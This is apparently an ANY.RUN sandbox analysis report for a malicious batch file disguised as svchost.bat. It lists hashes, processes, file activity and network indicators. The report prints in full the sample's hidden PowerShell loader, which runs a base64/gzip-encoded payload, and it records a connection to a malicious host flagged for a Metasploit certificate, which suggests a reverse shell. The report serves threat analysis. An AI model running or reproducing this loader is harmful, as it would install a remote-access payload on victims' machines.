File name: | svchost.bat |
Full analysis: | https://app.any.run/tasks/95f920f8-bc4a-4203-9087-ca03f99943c9 |
Verdict: | Malicious activity |
Analysis date: | July 12, 2020, 12:30:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | 9BDE49DF5FB69CB3027A8F6EC6DE5CC2 |
SHA1: | FE09F69B9E6796C0A5CC8C11819A869E3525675C |
SHA256: | 0BF71C0D2AD81A902303062CE754C2256FE8B3B6A7A4D136EBE7E18720FFC25D |
SSDEEP: | 48:hka13mXiixlEVCHqTyXtXVrOLikdQbrRLnxqh/bkCI:r1ixlEVCKTyXFZO+kdQn9kh/bkv |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2116 | cmd /c ""C:\Users\admin\AppData\Local\Temp\svchost.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2656 | powershell.exe -ep bypass -noni -nop -w hidden "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAN4lB18CA51W227jNhB991cMXHUtIRbhBOlLgCzqVbJtgOyusXKbB8NAaGocq5FJlaR8aeJ/LylRlhwn2KZ6sUXOnDk8c6F+gpFYo5wXHEK4k6nWyGG2hU/mZ1xIjhI+wBVdIfxOZbLtdIwl06ng8Bvq8A5nLEuRa+g8dcA83prBJXzFdfht9hcyDeF4m+NXukSzqImxj0r72pj8ofAK57TIdCQxMTspzZSB8LQscG81kmKzJS8szHprpbbt7BqKeX20zhOU+yMq6dKv/k9iLVP+MPUisVxSnvQPV2OVMcFfLF6JNc8ETcrVwGFKwVApcAIsRVJkaAn+6gdQmaRz8OswEOLf0J2lPOkG5WblV/pmqTLyG8kvTcit+b8kVrVYsEfUioxZfusspufnx25EaSq1jerilrsuQZctuyFjmGsDVyXDr4js3iIrcYVS4THfPXQr4a/xjkYuUDdPTv+ZEZ51++fnLmqn0k1piXRpaVaoxNRXXK4Zeg2xKi0VL1siXZeFFiulsrgGe4MYssKU+pbEtanv4ve9uakl7PtP3tig7yCkCiYHPt9xKTRGKHU6TxnV+CfN0oTagotols0oe5wGwSt0yLDQC1ut1mmojiQJWklr1GhO05ZrMttqnEynnv21xTYg5GxgnuefnwY7pyjypN72Jxo3miBnIrGVfHExjKObm8Cq/Mna+N07U5Jirap5EC8wy0AWnBtrMBoUypRlF07AQ766sG/cNvWJWTPp2G8wscwL3Wze80jkW5k+LDT4UQBng9Nf4EvKpFBiriESMhey1I7A0Ea0lgokmgArTMg9v+eu7pwmxA4p9JvT9Qf95oXcIn/Qi3bF1D3brpmjknmfVJOTKdwaSKuN63ey5/l+rrXXZyGvKVsYzhUopHw/TxqrhrZ9/IMxHJD6tNXEqpGC5xu+Eo8YXm9yo60yeu9Rdodt+C4leqMYeibPJYtbwcpMBmRE9cKs9j72/nfq1os0Q9/30rIHKvfvSBO/qvg+DPrgHfgFEHKEwVFury19TMbmKG9dTW40WBNSHvHaHblBMQ1OLZUWmptQpcz1ccBLgxdlZeaB1fIoARDWQ7YCP/v44RSe4VuhwwoVnBQHUGdQClIDG5F/kALoNSAbS8RDKYWcDKYHwVqsy33CMqTSD15jcNl+MY2/6Rx30n8qnwbmh63TLpWjxql9PmeFWuxvXTcG3XUSZUKhO09zE8Za5PX1Z74cOvsvhn1y3OUHobt57AD5F8Ks40A1CQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2656 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FDA27230WMFY4HXD13P9.temp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab7512.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar7513.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab7524.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar7525.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab75C2.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar75C3.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab818C.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar819D.tmp | — | |
MD5:— | SHA256:— | |||
2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab81CC.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2656 | powershell.exe | GET | 200 | 8.241.80.254:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 57.0 Kb | whitelisted |
2656 | powershell.exe | GET | 304 | 8.241.80.254:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 57.0 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2656 | powershell.exe | 8.241.80.254:80 | www.download.windowsupdate.com | Level 3 Communications, Inc. | US | unknown |
2656 | powershell.exe | 109.237.221.83:44 | pd1zb.nl | Mihos | NL | malicious |
Domain | IP | Reputation |
---|---|---|
pd1zb.nl |
| malicious |
www.download.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2656 | powershell.exe | Exploitation attributes have been detected | SHELL [PTsecurity] Metasploit-generated SSL Certificate |